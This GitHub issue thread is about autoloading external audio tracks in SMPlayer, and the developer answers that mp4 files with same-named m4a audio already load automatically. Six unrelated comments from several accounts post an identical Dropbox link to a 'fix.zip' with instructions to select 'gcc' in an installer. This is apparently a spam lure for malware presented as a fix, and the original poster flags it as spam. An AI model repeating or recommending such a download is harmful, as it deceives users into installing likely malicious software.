### ISSUE TITLE
Autoload external audio tracks or streamline the process

### ISSUE THREAD

**Issue by fccfc5d245c** [smplayer-dev/smplayer#1034]
**Is your feature request related to a problem? Please describe.**
Not a problem, but an annoyance. When a video has a external track, we have to load it manually first, and clicking "Load external file..." always gets us to the last used folder, which is never the one we want, so we have to navigate all the way to the desired folder. The audio tracks a user wants will almost always be in the same folder as the video, not in the folder of a previously watched movie.

**Describe the solution you'd like**
- Ideal solution:
Have audio tracks autoloaded like external subtitle files are, with the same config options ("same as movie", "containing movie name..." ). 

- Not so great solution:
When clicking "Audio / Load external file...", SMPlayer should open the folder where the currently playing video is located. No need to navigate anywhere then.

**Additional context**
Does anybody use external tracks?  Yes, we do. We edit video, or we like to make ourselves a copy with the best video source but adding a better track or language from another copy... there are lots of scenarios where, when tinkering before multiplexing, a faster way to test a track would save us a lot of time. In some cases, autoload would end the need to multiplex.
Also, SMPlayer would look more polished and professional.

Thank you!

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by fccfc5d245c** [comment]
What the actual fuck, do we have a spambot problem here??

**Comment by smplayer-dev** [comment]
Currently an audio file will be automatically loaded if the video file has the extension mp4 and the audio file has the extension m4a with the same name.

**Comment by fccfc5d245c** [comment]
I can't believe I'm so dumb I didn't try mp4 before writing here. Thank you, and sorry.
